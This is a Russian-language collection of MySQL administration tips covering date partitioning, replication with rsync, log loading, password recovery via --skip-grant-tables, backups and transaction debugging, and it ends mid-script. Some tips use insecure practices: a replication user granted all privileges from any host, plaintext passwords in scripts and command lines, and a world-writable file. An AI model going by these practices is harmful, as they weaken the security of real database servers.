UNIX_TIMESTAMP('2014-01-01 00:00:00'); = 1388520000 теперь: ALTER TABLE foo PARTITION BY RANGE (UNIX_TIMESTAMP(date_added)) ( PARTITION p2011 VALUES LESS THAN (1325361600) , PARTITION p2012 VALUES LESS THAN (1356984000) , PARTITION p2013 VALUES LESS THAN (1388520000) , PARTITION pMAXVALUE VALUES LESS THAN (MAXVALUE) ); вот, теперь получаем: ERROR 1503 (HY000): A PRIMARY KEY must include all columns in the table's partitioning function это лечится: ALTER table foo DROP PRIMARY KEY, add PRIMARY KEY (`id`,`date_added`); и еще раз: ALTER TABLE foo PARTITION BY RANGE (UNIX_TIMESTAMP(date_added)) ( PARTITION p2011 VALUES LESS THAN (1325361600) , PARTITION p2012 VALUES LESS THAN (1356984000) , PARTITION p2013 VALUES LESS THAN (1388520000) , PARTITION pMAXVALUE VALUES LESS THAN (MAXVALUE) ); все ок. получаем: CREATE TABLE `foo` ( `id` int(11) NOT NULL AUTO_INCREMENT, `date_added` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP, `name` varchar(30) DEFAULT NULL, `email` varchar(30) DEFAULT NULL, PRIMARY KEY (`id`,`date_added`) ) ENGINE=InnoDB PARTITION BY RANGE (UNIX_TIMESTAMP(date_added)) (PARTITION p2011 VALUES LESS THAN (1325361600) ENGINE = InnoDB, PARTITION p2012 VALUES LESS THAN (1356984000) ENGINE = InnoDB, PARTITION p2013 VALUES LESS THAN (1388520000) ENGINE = InnoDB, PARTITION pMAXVALUE VALUES LESS THAN MAXVALUE ENGINE = InnoDB); Отлично! Такой тип "нарезки" подходит если надо архивные данные разложить по файлам "за год" или по месяцам. Но как быть если надо, например, таблицу с логами разложить по дням месяца, то есть в таблицу что-то пишется что хранится месяц или два потом трется. То есть как быть если мы хотим порезать так PARTITION BY RANGE (MONTH(date)) или так PARTITION BY RANGE (DAY(date_add)) поле типа timestamp не подходит. Гугление говорит что надо использовать datetime. ок, создадим таблицу CREATE TABLE `foo` ( `id` int(11) NOT NULL AUTO_INCREMENT, `date_added` datetime DEFAULT NULL, `name` varchar(30) DEFAULT NULL, `email` varchar(30) DEFAULT NULL, PRIMARY KEY (`id`,`date_added`) ) ENGINE=InnoDB; Обратите внимание: `date_added` datetime DEFAULT NULL, дело в том что, CURRENT_TIMESTAMP в качестве значения по умолчанию для поля типа datetime не катит, NOW() как значение по умолчанию указывать нельзя т.к. функция. А надо чтоб date_added выставлялось автоматом. выхода 2 1. либо во всех запросах в INSERT добавлять NOW(). 2. если первое невозможно, то вешать триггер который при каждом добавлении будет date_added=NOW(); что-то вроде DELIMITER $$ USE `test_db`$$ CREATE /*!50017 DEFINER = 'trigger'@'%' */ TRIGGER `foo_add` BEFORE INSERT ON `foo` FOR EACH ROW BEGIN SET NEW.date_added = IFNULL(NEW.date_added, NOW()); END; $$ Теперь у нас таблица с нужными типами, ключами и триггером. и мы с легкостью можем разрезать таблицу по месяцам: ALTER TABLE foo PARTITION BY RANGE (MONTH(date_added)) ( PARTITION p01 VALUES LESS THAN (02) , PARTITION p02 VALUES LESS THAN (03) , PARTITION p03 VALUES LESS THAN (04) , PARTITION p04 VALUES LESS THAN (05) , PARTITION p05 VALUES LESS THAN (06) , PARTITION p06 VALUES LESS THAN (07) , PARTITION p07 VALUES LESS THAN (08) , PARTITION p08 VALUES LESS THAN (09) , PARTITION p09 VALUES LESS THAN (10) , PARTITION p10 VALUES LESS THAN (11) , PARTITION p11 VALUES LESS THAN (12) , PARTITION p12 VALUES LESS THAN (13) , PARTITION pmaxval VALUES LESS THAN MAXVALUE ); или даже по дням недели: ALTER TABLE foo PARTITION BY RANGE (DAYOFWEEK(date_added)) ( PARTITION p01 VALUES LESS THAN (2) , PARTITION p02 VALUES LESS THAN (3) , PARTITION p03 VALUES LESS THAN (4) , PARTITION p04 VALUES LESS THAN (5) , PARTITION p05 VALUES LESS THAN (6) , PARTITION p06 VALUES LESS THAN (7) , PARTITION p07 VALUES LESS THAN (8) , PARTITION pmaxval VALUES LESS THAN MAXVALUE ); или даже 2 дня на partition: ALTER TABLE foo PARTITION BY LIST (DAY(date_added)) ( PARTITION p00 VALUES IN (0,1) , PARTITION p02 VALUES IN (2,3) , PARTITION p04 VALUES IN (4,5) , PARTITION p06 VALUES IN (6,7) , PARTITION p08 VALUES IN (8,9) , PARTITION p10 VALUES IN (10,11), PARTITION p12 VALUES IN (12,13), PARTITION p14 VALUES IN (14,15), PARTITION p16 VALUES IN (16,17), PARTITION p18 VALUES IN (18,19), PARTITION p20 VALUES IN (20,21), PARTITION p22 VALUES IN (22,23), PARTITION p24 VALUES IN (24,25), PARTITION p26 VALUES IN (26,27), PARTITION p28 VALUES IN (28,29), PARTITION p30 VALUES IN (30,31) ); В общем теперь все в ваших руках. P.S. Подразумевается что выставлена опция innodb_file_per_table

Автозаполнение столбцов для автоинкремента в MySQL Автор: Lennotoecom [комментарии]

Задача: В существующую таблицу добавить столбец, автоматически заполнить его от 1 до количества строк в таблице, сделать его ключевым с автоинкрементом. Решение: Исходная таблица mysql> select * from tTable; +------+ | b | +------+ | aa | | ab | | ac | | ad | | ae | | af | | ag | | ah | +------+ 8 rows in set (0.00 sec) Добавляем столбец командой: mysql> alter table tTable add a int; теперь таблица имеет вид mysql> select * from tTable; +------+------+ | b | a | +------+------+ | aa | NULL | | ab | NULL | | ac | NULL | | ad | NULL | | ae | NULL | | af | NULL | | ag | NULL | | ah | NULL | +------+------+ 8 rows in set (0.00 sec) Собственно само автозаполнение: mysql> set @x:=0; update tTable set a=(@x:=@x+1); После чего таблица будет иметь вид mysql> select * from tTable; +------+------+ | b | a | +------+------+ | aa | 1 | | ab | 2 | | ac | 3 | | ad | 4 | | ae | 5 | | af | 6 | | ag | 7 | | ah | 8 | +------+------+ Делаем столбец ключом и автоинкрементом: mysql> alter table tTable change a a int key auto_increment; вид таблицы после изменения mysql> show columns from tTable; +-------+---------+------+-----+---------+----------------+ | Field | Type | Null | Key | Default | Extra | +-------+---------+------+-----+---------+----------------+ | b | char(2) | YES | | NULL | | | a | int(11) | | PRI | NULL | auto_increment | +-------+---------+------+-----+---------+----------------+ 2 rows in set (0.00 sec)

Как обновить MySQL 5.0 до MySQL 5.1 в Gentoo Linux (доп. ссылка 1) Автор: Dennis Yusupoff [комментарии]

Возникла необходимость обновить MySQL 5.0 до MySQL 5.1 в Gentoo с минимальным перерывом в работе, описываю свой опыт. Вполне допускаю, что будет для гуру банальностью, тем не менее, как "напоминалка" будет полезна. Хотя бы мне самому :) Основой послужили статья Peter Davies'a и руководство MySQL Upgrading MySQL. 1. Работа с пакетами Поскольку Gentoo считает, что версии 5.1 недостойны называться стабильными (хотя она уже довольно давно является "релизной", в отличии от 5.4. см. планы развития веток MySQL), то они занесены в список исключений, т.н. "masked", так что при попытке установить их без вынесения из этого списка приведут к ошибке. Чтобы обойти это, нужно зарегистрировать эту версию MySQL в "список исключений из списка исключений" :) echo "=dev-db/mysql-community-5.1.21_beta" >> /etc/portage/package.unmask Если просто комментировать соответствующие строки в файле /usr/portage/profiles/package.mask, как это предлагает Питер, то при каждом обновлении пакета этот файл будет обновляться, с соответственным удалением комментариев. Не совершайте такой ошибки, какую сделал я :) Gentoo у меня собран 64-битной версией, поэтому не обойтись без явного задания разрешения сборки MySQL под amd64. Для этого вносим соответствующую запись в очередной файл исключений: echo "dev-db/mysql-community ~amd64" >> /etc/portage/package.keywords и на всякий случай: echo "virtual/mysql ~amd64" >> /etc/portage/package.keywords Если просто выставить в командной строке ACCEPT_KEYWORDS="~amd64", то Gentoo не поймет, что такое ключевое слово было выставлено при установке, и как итог, любое (авто-)обновление пакета остановится с ошибкой "masked by: ~amd64". Думаете, что этого уже достаточно для установки? Ошибаетесь :) Помните, что у нас ещё стоит версия 5.0? Так вот чтобы установить 5.1, нам надо сначала удалить 5.0. Явно не быстрое дело, а время простоя, напомню, критично. Поэтому вместо остановки работающего 5.0, его удаления и компиляции 5.1, лучше сделать хитрее и воспользоваться возможностью создания бинарных пакетов. Создам сначала бинарный пакет установленного mysql-5.0, чтобы в случае неудачи с 5.1 можно было быстро откатится на предыдущую версию: quickpkg dev-db/mysql или emerge --verbose --buildpkg dev-db/mysql Затем подготовим нашу новую версию, создав бинарный пакет для последующей установки: emerge --verbose --ask --buildpkgonly =dev-db/mysql-community-5.1.21_beta Использование distcc и ccache обычно позволяет существенно уменьшить время компиляции. У меня при использовании ccache и distcc на два сервера время сборки пакета mysql-5.0 уменьшилось на 35%. 2. Создание архивной копии Почему идёт вторым шагом? Потому что операции, приведённые выше, по идее не должны вызывать никаких изменений в работающем MySQL, но занимают определённое количество времени, а терять изменения, внесённые в БД за это время, не хочется. Делаете любым удобным для себя способом, хотя бы как это описывает Питер, через mysqldump, архивирование директории с БД после её остановки или репликацию на другой сервер. Поскольку для меня было важным минимальный перерыв, а настраивать репликацию я не хотел, я воспользовался первым способом: mysqldump -A --opt --allow-keywords --flush-logs --hex-blob --master-data --max_allowed_packet=16M \ --quote-names --default-character-set=CP1251 --single-transaction --result-file=BACKUP_MYSQL_5.0.SQL Единственное, что я хотел бы порекомендовать, это использовать помимо указанных Питером ключей, ключ --single-transaction, который существенно ускоряет восстановление из бэкапа, и ключ --default-character-set со значением "cp1251" для тех, у кого таблицы в cp1251, а не в UTF8, который выставляется при дампах по умолчанию. У меня бекап, созданный без этих ключей весил 4.6 Гб, с ключами - 4.1 Гб 3. Обновление MySQL и таблиц Итак, пакеты и архивные копии готовы, предупреждаем тех.поддержку о возможных перебоях и приступаем: Останавливаем работающий MySQL: /etc/init.d/mysql stop Удаляем MySQL 5.0: emerge --unmerge --verbose dev-db/mysql Устанавливаем бинарный пакет MySQL 5.1: emerge --usepkgonly --verbose =dev-db/mysql-community- 5.1.21_beta.tbz2 Запускаем установленный MySQL 5.1: /etc/init.d/mysql start Обновляем таблицы: mysql_upgrade --user=root --password=PASSWORD --default-character-set=cp1251 --verbose При удачном раскладе (объединяйте команды в конвейер с помощью "&&"!) это займёт меньше минуты. Учтите, что опции сервера, указанные в /etc/mysql/my.cnf, для 5.1 могут отличатся от 5.0! Поэтому если сервер не стартует, смотрите tail /var/log/mysql/mysqld.err и исправляйте переменные. Мне, скажем, пришлось терять время, пока я убирал "skip-bdb" и "skip-federated". К сожалению, я не знаю другого способа проверить на совместимость файлы от 5.0 и 5.1, кроме как скурпулезного сравнения документации.

Синхронизация файлов и содержимого БД MySQL на резервный сервер (доп. ссылка 1) Автор: neiro [комментарии]

Есть два сервера под Linux/FreeBSD: СУБД MySQL + некое приложение, задача - синхронизировать БД и данные. За синхронизацию данных MySQL отвечает mysql replication, данные синхронизируются с мастера на слейв. Делаем на мастере: в my.cnf добавляем строки log-bin = /var/log/mysql/mysql-bin.log binlog-do-db=databasename server-id=1 перезагружаем MySQL, добавляем пользователя для репликации: GRANT ALL PRIVILEGES ON databasename.* TO 'slave_user'@'%' IDENTIFIED BY 'slave_password'; FLUSH PRIVILEGES; далее выполняем команду: USE databasename; FLUSH TABLES WITH READ LOCK; SHOW MASTER STATUS; и вывод этой команды для нас важен, надо его куда-нибудь записать: | File | Position | Binlog_do_db | Binlog_ignore_db | | mysql-bin.001 | 10 | databasename | | теперь делаем дамп базы: mysqldump -u slave_user -pslave_password --opt databasename > databasename.dump и наконец убираем лок с базы в MySQL: UNLOCK TABLES; Теперь на слейве: Создаём базу: mysqladmin create databasename -p Востанавливаем базу из дампа: mysql -u slave_user -pslave_password databasename < databasename.dump в my.cnf добавляем строки: server-id=2 master-host=XX.XX.XX.XX # IP адрес мастер-сервера master-user=slave_user master-password=slave_password master-connect-retry=60 replicate-do-db=databasename перегружаем MySQL и добавляем чудесные данные из волшебной комманды: SLAVE STOP; CHANGE MASTER TO MASTER_HOST='XX.XX.XX.XX', MASTER_USER='slave_user', MASTER_PASSWORD='slave_password', MASTER_LOG_FILE='mysql-bin.001', MASTER_LOG_POS=10; START SLAVE; готово, теперь проверяем, добавляем запись в мастер, на слейве она должны отреплицироваться. Понятно, что изменять данные можно только на мастере, слейв работает только на чтение. Для синхронизации данных имеет смысл использовать rsync, очень интересный протокол/приложение. Может синхронизировать инкрементально и с сжатием. На мастер сервере в rsyncd.conf добавляем: read only = yes # во избежание ;-) hosts allow = YY.YY.YY.YY # IP адрес слэйв-сервера [somelabel] path = /path/to/apllication/folder # где лежит приложение auth users = replica_user # юзер только для репликации в rsync, не системный пользователь secrets file = /path/to/rsync/rsync.secret # где лежит файл с паролем для replica_user, # только пароль и ничего больше на слейве - команда для синхронизации, можно добавить в cron с нужной периодичностью: /path/to/rsync -avz --exclude-from=/path/to/rsync.exclude \ --password-file /path/to/rsync.secret \ rsync://replica_user@XX.XX.XX.XX:873/somelabel /path/to/application где: rsync.exclude - файл в котором перечислены, какие файлы (конкретно или по маске) не синхронизировать rsync.secret - файл с секретным паролем для replica_user ХХ.ХХ.ХХ.ХХ - IP мастер-сервера, 873 - дефолтный порт для демона somelabel - метка из rsyncd.conf с мастера /path/to/application - путь куда класть данные.

Быстрй перенос лог-файлов в MySQL Автор: Alexey Lazarev [комментарии]

Наверняка, каждый сталкивался с задачей переноса лог-файлов из текстовых файлов в различные БД. И, наверняка, каждый столкнувшийся начинал писать собственные скрипты под это дело. Причем большинство виденных мной скриптов основывались на построчном чтении/переносе данных. Данный способ, конечно, хорош и имеет право на существование, но, к сожалению не очень быстр. Но в MySQL существует способ перенести данные из обычных текстовых файлов в БД очень и очень быстро при помощи директивы LOAD DATA INFILE Пример такого скрипта: #!/bin/bash nld='/var/log/squid3' # Путь к лог-файлам nbd='/opt/backup/squid3' # Путь к папке резервного хранения лог-файлов nrc=`squid3 -k rotate` # Команда ротации лог-файлов для данного сервиса nlf='/var/log/logs2mysql/squid.log' # На всякий случай пишем что и когда делали mh='localhost' # Mysql host mu='root' # Пользователь mysql mp='secret' # Его пароль mb='logs' # База данных mt='squid' # Таблица echo `date +"%F %T"` "Начало выгрузки" >> $nlf && \ $nrc && \ for i in `ls $nld | grep access.log.`; do year=`date +"%Y"` month=`date +"%m"` day=`date +"%d"` prefix=`date +"%F-%H"` test -d $nbd/$year/$month/$day || mkdir -p $nbd/$year/$month/$day && \ cat $nld/$i | sed -e 's/\"/\\\"/g' | sed -e "s/\'/\\\'/g" | \ awk ' {print strftime("%F",$1),strftime("%T",$1),$1,$2,$3,$4,$5,$6,$7,$8,$9,$10,$11,$1 $2 $3 $4 $5 $6 $7 $8 $9 $10 $11} ' | \ sed -e "s/ /\t/g" > $nld/prepare.log && \ chmod 0777 $nld/prepare.log && \ mysql -h $mh -u $mu -p$mp -e "LOAD DATA INFILE \"$nld/prepare.log\" REPLACE INTO TABLE $mb.$mt;" && \ cat $nld/$i >> $nbd/$year/$month/$day/$prefix.log && rm $nld/$i && rm $nld/prepare.log done echo `date +"%F %T"` "Конец выгрузки" >> $nlf Поля для таблицы ('Поле'-тип) 'date'-date 'time'-time 'timestamp'-varchar(16)(разные сервисы пишут по разному.Кто-то с милисекундами, кто-то без) 'elapsed'-int(20) 'ip'-varchar(15) 'code'-varchar(20) 'size'-int(20) 'method'-varchar(10) 'url'-varchar(255) 'user'-varchar(255) 'direct'-varchar(25) 'mime'-varchar(25) 'hash'-varchar(255)unique C небольшими изменениями данный скрипт можно приспособить для обработки лог-файлов не только squid, но и других сервисов. Необходимое условие: четкое разграничение полей (можно, поиграться с указанием разграничителей полей в директиве LOAD DATA INFILE). К преимуществам данного скрипта можно отнести огромное быстродействие (п4-3,2 1024Мб ОЗУ 4млн. строк за 10-12 сек.).Также по последнему полю "hash" мы можем уникальным образом идентифицировать строку (при анализе логов за год по squid и net-acct я не обнаружил одинаковых строк).А также гарантированное попадание всех строк в БД (т.к. данные не удаляются при сбое mysql).

Смена mysql пароля для пользователя debian-sys-maint. (доп. ссылка 1) Автор: Heckfy [комментарии]

Столкнулся с тем, что система отказалась проапгрейдиться посредством apt, так как не удается завершить демон mysql. Оказалось, что запуск и остановку демона делает пользователь базы данных debian-sys-maint. Пароль у него был заменен на что-то уже неизвестное, поэтому неоходимо было найти debian-way. В файле /etc/mysql/debian.cnf находится какой-то страшный набор символов. Корректируем его, если есть желание, далее меняем пароль в базе. Например, так: # killall mysqld # mysqld_safe --skip-grant-table ^Z # bg # mysql -u root > UPDATE mysql.user SET Password = PASSWORD( 'новый пароль' ) WHERE user.Host = 'localhost' AND user.User = 'debian-sys-maint'; > exit # fg ^C # /etc/init.d/mysql start Теперь демон легко стартует, завершается, перезапускается. Автоматическое обновление системы снова может беречь мой сон.

Дамп больших InnoDB таблиц в MySQL (доп. ссылка 1) Автор: ducea.com [комментарии]

При дампе больших (10 Gb) InnoDB таблиц в MySQL через mysqldump на время операции таблица оказывается заблокированной. Для того чтобы избежать блокировки и нарушения целостности нужно использовать ключ --single-transaction: mysqldump --single-transaction --quick very_large_db > bakup_of_db.sql

Пример работы с MySQL в bash скриптах Автор: Luc!f3r [комментарии]

Пример1: password='Your_MySQL_Password' MYSQL_RESULT=`mysql -e "SELECT tables_col FROM table_name" -- password="$password" database_name|grep -v tables_col|xargs|sed "s/ /\n/g"` for i in $MYSQL_RESULT; do echo $i done; Пример2: mysql -sse "SELECT col FROM table" -p"$password" database | while read i do echo $i done Комментарий 1: Пароль лучше передавать через переменную окружения MYSQL_PWD, чтобы он не светился в выводе ps. Комментарий 2 (от myhand): Другой вариант передача пароля через локальный файл конфигурации .my.cnf, размещенный в корне домашней директории пользователя: Пример .my.cnf: [client] user = имя_пользователя password = пароль host = хост_БД [mysql] database = имя_бд

Пример полнотекстового поиска в mySQL (доп. ссылка 1) Автор: MEDBEDb [обсудить]

CREATE TABLE table ( id INT UNSIGNED AUTO_INCREMENT NOT NULL PRIMARY KEY, column TEXT, FULLTEXT (column) ); SELECT * FROM table WHERE MATCH (column) AGAINST ('информация'); AGAINST ('форма содержание') - все выражения, содержащие хотя бы одно из слов. AGAINST ('+форма +содержание') - оба слова. AGAINST ('+форма содержание') - искать "форма", при "содержание" больший релевант. AGAINST ('+форма -содержание') - "форма" без "содержание". AGAINST ('форма*') - "форма", "формат", "формация" AGAINST ('"форма или содержание"') - жестко по фразе

Как в MySQL обеспечить правильную сортировку данных в кодировке cp1251. [комментарии]

MySQL должен быть собран с ключами: ./configure --with-charset=koi8_ru --with-extra-charsets=all Далее, сразу после каждого соединения с базой нужно использовать оператор: SET CHARACTER SET cp1251_koi8 Если данные в cp1251 уже в базе, их нужно поместить в базу вновь.

Как сделать таблицу Exel из таблицы MySQL Автор: Sergei A. Merkulov [комментарии]

#!/usr/local/bin/perl use DBI; $table = "table"; $db = "base"; $db_serv = "192.168.0.1"; $user = "ser"; $passwd = "ser"; $c = DBI->connect("DBI:mysql:$db:$db_serv", $user, $passwd); $statement = "select count(*) from $table"; $cc = $c->prepare($statement); $ccc = $cc->execute; @row = $cc->fetchrow_array; $n = $row[0]; $statement = "select * from $table"; $cc = $c->prepare($statement); $ccc = $cc->execute; open F, "$ARGV[0]"; for ($i=0; $i<$n; $i++) { @row = $cc->fetchrow_array; print F "$row[0];$row[1];$row[3]\n"; } Запускаем скрипт: ./mysql_2_exel.pl file После этого можно открыть файл 'file' экселем.

Как поместить время в формате Epoch в MySQL [обсудить]

from_unixtime(989493919)

Использование одного автоинкрементального счетчика для нескольких таблиц в MySQL (доп. ссылка 1) (доп. ссылка 2) [комментарии]

Решение задачи сохранения единого для нескольких таблиц автоинкрементального счетчика. Иными словами, как реализовать в MySQL аналог SEQUENCE в PostgreSQL, работающих примерно так: CREATE SEQUENCE next_contraсt start 1 increment 1 maxvalue 2147483647 minvalue 1 cache 1; CREATE TABLE contract ( "id" integer NOT NULL DEFAULT nextval('next_contraсt') PRIMARY KEY, ... ); Метод 1. Создаем таблицу: CREATE TABLE option1 (id int not null primary key auto_increment) engine=innodb; При необходимости получения очередного номера счетчика выполняем (фиктивная вставка данных, необходимая для срабатывания auto_increment): INSERT INTO option1 VALUES (NULL); Получаем текущее значение идентификатора через API-вызов $connection->insert_id(), например, в PHP: $last_id = mysql_insert_id(); Метод 2: Создаем таблицу из одного столбца: CREATE TABLE option2 (id int not null primary key) engine=innodb; Инициализируем первое значение: INSERT INTO option2 VALUES (1); # начинаем последовательность с 1 Для получения очередного значения счетчика выполняем: UPDATE option2 SET id=@id:=id+1; SELECT @id; По производительности первый метод заметно быстрее второго: Метод 1 с использованием транзакций: 19 сек на выполнение 10000 итераций Метод 1 без использования транзакций: 13 сек на выполнение 10000 итераций Метод 2 с использованием транзакций: 27 сек на выполнение 10000 итераций Метод 2 без использования транзакций: 22 сек на выполнение 10000 итераций Метод 3. Использовать функцию LAST_INSERT_ID(), которая возвращает последний сгенерированный через AUTO_INCREMENT на сервере идентификатор. UPDATE option3 SET id = LAST_INSERT_ID(id+1); Метод 4. Использование хранимых процедур и триггеров. Создаем таблицу sequences для хранения счетчика и функцию nextval('seqname') для возвращения следующего номера: CREATE TABLE IF NOT EXISTS sequences (name CHAR(20) PRIMARY KEY, val INT UNSIGNED); DROP FUNCTION IF EXISTS nextval; DELIMITER // CREATE FUNCTION nextval (seqname CHAR(20)) RETURNS INT UNSIGNED BEGIN INSERT INTO sequences VALUES (seqname,LAST_INSERT_ID(1)) ON DUPLICATE KEY UPDATE val=LAST_INSERT_ID(val+1); RETURN LAST_INSERT_ID(); END // DELIMITER ; Создаем тестовую таблицу data для последующего подключения генератора последовательности: CREATE TABLE IF NOT EXISTS data (id int UNSIGNED NOT NULL PRIMARY KEY DEFAULT 0, info VARCHAR(50)); Создаем триггер для автоматизации инкрементирования счетчика в таблице data: DROP TRIGGER nextval; CREATE TRIGGER nextval BEFORE INSERT ON data FOR EACH ROW SET new.id=IF(new.id=0,nextval('data'),new.id); TRUNCATE TABLE data; Экспериментируем: INSERT INTO data (info) VALUES ('bla'); INSERT INTO data (info) VALUES ('foo'),('bar'); SELECT * FROM data; +----+------+ | id | info | +----+------+ | 1 | bla | | 2 | foo | | 3 | bar | +----+------+

насчет "Как ограничить число элементов выдаваемых SELECT в MySQL" Автор: Vovik Alyekhin [обсудить]

параметры limit действуют с точностью до наоборот. первый параметр с какой записи, а второй сколько. По крайней мере для mysql. MC: Интересно, для PostgreSQL: "LIMIT { count | ALL } [ { OFFSET | , } start ]]"

Оптимизация и администрирование MySQL

Частичное восстановление данных MySQL из бэкапа, созданного с использованием LVM (доп. ссылка 1) Автор: Андрей Татаранович [комментарии]

Я не буду описывать процесс создания резервной копии MySQL с применением менеджера томов LVM. В интернете хватает описаний этой методики. Предположим у вас уже есть бэкап, который содержит бинарные файлы баз данных. В моем случае они хранятся на выделенном сервере. Использование бинарных файлов позволяет быстро восстановить все базы на момент создания резервной копии, но вот что делать если нужно восстановить только часть баз или только одну, или же только пару таблиц или несколько удаленных записей из таблиц? Конечно можно поднять отдельный MySQL сервер на другом сервере, скопировать туда бэкап и после запуска вытащить из него нужные данные посредством mysqldump. Но что делать, если другого сервера нет или версия MySQL сервера содержит патчи, которые делают резервную копию несовместимой с дистрибутивной версией? Я постараюсь дать одно из возможных решений этой проблемы. В своем способе я также буду запускать отдельную копию MySQL сервера, но основная идея заключается в том, чтобы не копировать данные из бэкапа, а примонтировать их через сеть. Я буду использовать sshfs для этих целей. Чтобы при запуске второго сервера не изменились данные в бэкапе я применю оверлей на базе AUFS. Одна из его частей будет примонтированным бэкапом, а вторая - хранить все изменения относительно бэкапа. Таким образом я избегаю любых модификаций резервной копии. # mkdir /mnt/mysql-{backup,datadir,tmp} # sshfs root@backup.server:/backup/mysql-server /mnt/mysql-backup # mount -t aufs none /mnt/mysql-datadir -o dirs=/mnt/mysql-tmp:/mnt/mysql-backup=ro # mysqld_safe --defaults-file=/root/mysql-backup-restore.cnf /root/mysql-backup-restore.cnf - конфигурация для второго сервера, которую я сделал на базе конфига из дистрибутива. [mysqld] user=root pid-file = /root/mysql-restore.pid socket = /root/mysql-restore.sock basedir = /usr datadir = /mnt/mysql-datadir tmpdir = /tmp language = /usr/share/mysql/english skip-networking skip-external-locking key_buffer = 16M max_allowed_packet = 16M thread_stack = 192K thread_cache_size = 8 myisam-recover = BACKUP query_cache_limit = 1M query_cache_size = 16M expire_logs_days = 10 max_binlog_size = 100M [mysqldump] quick quote-names max_allowed_packet = 16M [isamchk] key_buffer = 16M !includedir /etc/mysql/conf.d/ После запуска вторая копия MySQL сервера доступна только через сокет /root/mysql-restore.sock, чем позволяет исключить посторонний доступ на время восстановления данных. Чтобы подключиться к запущенному серверу, нужно явно указать сокет: # mysql -S /root/mysql-restore.sock # mysqldump -S /root/mysql-restore.sock --add-drop-table dbname table1 table2 > dbrestore.sql После того, как данные сняты посредством mysqldump нужно остановить вторую копию сервера. Для этого нужно выполнить: # mysqladmin -S /root/mysql-restore.sock shutdown Когда дополнительный сервер остановится можно отмонтировать /mnt/mysql-datadir и /mnt/mysql-backup, и удалить директории /mnt/mysql-{backup,datadir,tmp} Несомненным преимуществом такого подхода является время, которое тратится на частичное восстановление резервной копии. Из недостатков пожалуй отсутствие sshfs и aufs во многих дистрибутивах (для centos я так и не смог найти пакета для добавления поддержки aufs). Возможно его следует заменить на любую другую реализацию union fs, но я это делать не пробовал.

Рекомендации по оптимальному использованию типов данных в MySQL Автор: gara [комментарии]

Материал основан на рекомендациях, данных в книге "MySQL Оптимизация производительности", в которой подробно рассказано почему каждая рекомендация работает так, а не иначе. В заметке лишь приведены ключевые моменты, в стиле "Делайте так!". Все нижесказанное будет относиться к MySQL 5.1 и выше. Движок InnoDB. Для MyISAM также верно почти все нижесказанное. Прежде чем говорить о типах, рекомендация относительно NULL/ NOT NULL. Наличие флага NULL, увеличивает объем данных при хранении на диске. И немного нагружает индексы. Определяйте типы полей как NOT NULL, и указывайте DEFAULT VALUE. Большой выигрыш в производительности это не даст, но как говорится "Копейка рубль бережет". UUID - удалите тире или преобразуйте в 16 байтовые числа UNHEX() и сохранить в столбце BIN(16). Извлекать данные в шестнадцатеричном формате можно с помощью MySQL функции HEX(). IP адреса лучше всего хранить как UNSIGNED INT. И использовать MySQL функции INET_ATON() и INET_NTOA() Итак, наиболее часто используются типы int, varchar/char, date/time, enum. Выбор оптимальных типов данных. 1. INT - все понятно, ничего интересного. 2. CHAR / VARCHAR VARCHAR имеет переменную длину в файле. Занимает столько места сколько записано данных. При UPDATE если данных стало больше - выделяется место в другом месте файла. Это создает дополнительную нагрузку и является причиной фрагментации. Используйте VARCHAR если данные обновляются редко, либо используется сложная кодировка, например UTF-8. Идеально для хранения неизменяемых данных. CHAR имеет фиксированную длину в файле. Фрагментация ему не страшна. CHAR полезен когда нужно хранить короткие строки приблизительно одинаковой длинны. Частое обновление не ведет к фрагментации. Идеален для хранение MD5 (CHAR(32)). Старайтесь использовать CHAR, сортировка по такому полю обходится сильно "дешевле". 3. DATETIME / TIMESTAMP - Используйте TIMESTAMP, он занимает на диске меньше места. 4. ENUM При создании таблицы: CREATE TABLE enum_test ( e ENUM('fish','dog','apple') NOT NULL); создается справочник-индекс в *.frm файле. И при последующих INSERT/UPDATE в базу записывается номер(индекс) ENUM поля. INSERT INTO enum_test(e) VALUES ('fish'),('dog'),('apple'); SELECT e + 0 FROM enum_test; вернет 1 3 2 И сортировка происходит (сюрприз) по этим целочисленным значениям :) SELECT e FROM enum_test ORDER BY e; fish apple dog Обойти это неудобство можно используя FIELD(). Не используйте JOIN между CHAR/VARCHAR и ENUM.

Отладка долго выполняющихся транзакций в MySQL (доп. ссылка 1) [комментарии]

Включение лога долго выполняющихся запросов в MySQL (настройка log-slow-queries) не спасает при необходимости выявления транзакций, находящихся длительное время в незакрытом состоянии. Транзакции, внутри которых были изменены данные, но которые остаются висеть без коммита, достаточно трудно выявить и сопоставить с источником (в списке активных запросов по "SHOW PROCESSLIST" они не видны), в то время как они могут привести к разнообразным проблемам с блокировками и неудачному завершению других операций после истечения таймаута. Для отладки проблемы обычно определяют какая из транзакция блокирует остальные. Затем, определяется TCP-порт для проблемного соединения, запускается сниффер и используется утилита mk-query-digest для создания лога выполняемых запросов. В MySQL 5.1, при использовании InnoDB plugin, блокирующую транзакцию выявить значительно проще - поддерживаются специальные INFORMATION_SCHEMA таблицы, запросив которые можно определить идентификатор нити, обрабатывающей висящую транзакцию, после чего найти этот идентификатор в выводе "SHOW PROCESSLIST" и увидеть имя хоста и номер порта инициатора проблемы. В более ранних ветках MySQL и во встроенном движке InnoDB (не InnoDB plugin) найти проблемное сетевое соединение не так просто, можно лишь субъективно оценить вывод "SHOW INNODB STATUS", выбрав старейшую транзакцию, находящуюся в статусе ожидания или блокировки. Иногда таким образом удается угадать проблемную транзакцию, а иногда - нет. Чтобы автоматизировать выявление проблемных транзакций написан небольшой скрипт, который запускается каждые 30 секунд, смотрит статус и находит проблемные позиции в списке. Для проблемных транзакций выявляется номер порта, запускается сниффер и сохраняется лог. #!/bin/bash # Begin by deleting things more than 7 days old find /root/tcpdumps/ -type f -mtime +7 -exec rm -f '{}' \; # Bail out if the disk is more than this %full. PCT_THRESHOLD=95 # Bail out if the disk has less than this many MB free. MB_THRESHOLD=100 # Make sure the disk isn't getting too full. avail=$(df -m -P /root/tcpdumps/ | awk '/^\//{print $4}'); full=$(df -m -P /root/tcpdumps/ | awk '/^\//{print $5}' | sed -e 's/%//g'); if [ "${avail}" -le "${MB_THRESHOLD}" -o "${full}" -ge "${PCT_THRESHOLD}" ]; then echo "Exiting, not enough free space (${full}%, ${avail}MB free)">&2 exit 1 fi host=$(mysql -ss -e 'SELECT p.HOST FROM information_schema.innodb_lock_waits w INNER JOIN information_schema.innodb_trx b ON b.trx_id = w.blocking_trx_id INNER JOIN information_schema.processlist p on b.trx_mysql_thread_id = p.ID LIMIT 1') if [ "${host}" ]; then echo "Host ${host} is blocking" port=$(echo 